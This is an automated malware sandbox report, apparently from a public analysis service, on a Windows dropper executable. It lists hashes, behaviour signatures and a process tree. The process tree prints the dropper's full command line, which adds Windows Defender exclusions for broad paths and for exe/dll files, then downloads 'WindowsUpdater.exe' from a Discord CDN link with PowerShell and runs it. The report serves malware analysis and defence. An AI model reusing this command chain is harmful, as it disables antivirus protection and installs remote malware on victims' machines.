Overview

overview

10

Static

static

3

ea63600880...18.exe

windows7-x64

10

ea63600880...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19/09/2024, 02:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ea636008805a0ef9e5147b5bd2d1aa94_JaffaCakes118.exe

  • Size

    55KB

  • MD5

    ea636008805a0ef9e5147b5bd2d1aa94

  • SHA1

    f15c13f68e9dcd774b9fae8850d828510d64f9c1

  • SHA256

    4e6dce334a8b9fbf42231cad17af17b943de13cfbc1f55e9624cda0fbc4986cc

  • SHA512

    6502a4414554730aa19f4987c28c68bd00f9c2e4e2f2f506a81a06291a12bba28abfceb9a40742e87745f69db63ede360b027f4265bba6c627dc0c9ee2b76801

  • SSDEEP

    1536:hxV96b1u6/f4h5TLoPs2Ldd5l6shjOUh:h6Foh5TLoPs2Lb6sZT

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/878081249296674846/892398462266671104/WindowsUpdater.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ea636008805a0ef9e5147b5bd2d1aa94_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ea636008805a0ef9e5147b5bd2d1aa94_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/878081249296674846/892398462266671104/WindowsUpdater.exe', (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe')) & powershell Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe') & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2196
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2660
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/878081249296674846/892398462266671104/WindowsUpdater.exe', (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe'))
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'WindowsUpdater.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:936

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    c6da1316d5088e02033fdbbd12b1ba2c

    SHA1

    cc6a571affc97c8a8e72bdb487ce0282af3b3caa

    SHA256

    132eca3289f3055b0b5e8719e02700af303c5861e8ebe1915bc5fc64a983a669

    SHA512

    54b917c29ad5801c6498c673c98b6498ad9dc239c280c2e37835594e578368de1a0cf5124a33b42e7b20284323d0409feed42e5ca00b6423934dcab94afc1445

    Download Submit

  • memory/2196-7-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2196-8-0x0000000001E20000-0x0000000001E28000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2660-14-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2660-15-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2748-0-0x000007FEF5233000-0x000007FEF5234000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2748-1-0x0000000000370000-0x0000000000384000-memory.dmp

    Filesize

    80KB

    Download

  • memory/2748-2-0x000007FEF5230000-0x000007FEF5C1C000-memory.dmp

    Filesize

    9.9MB

    Download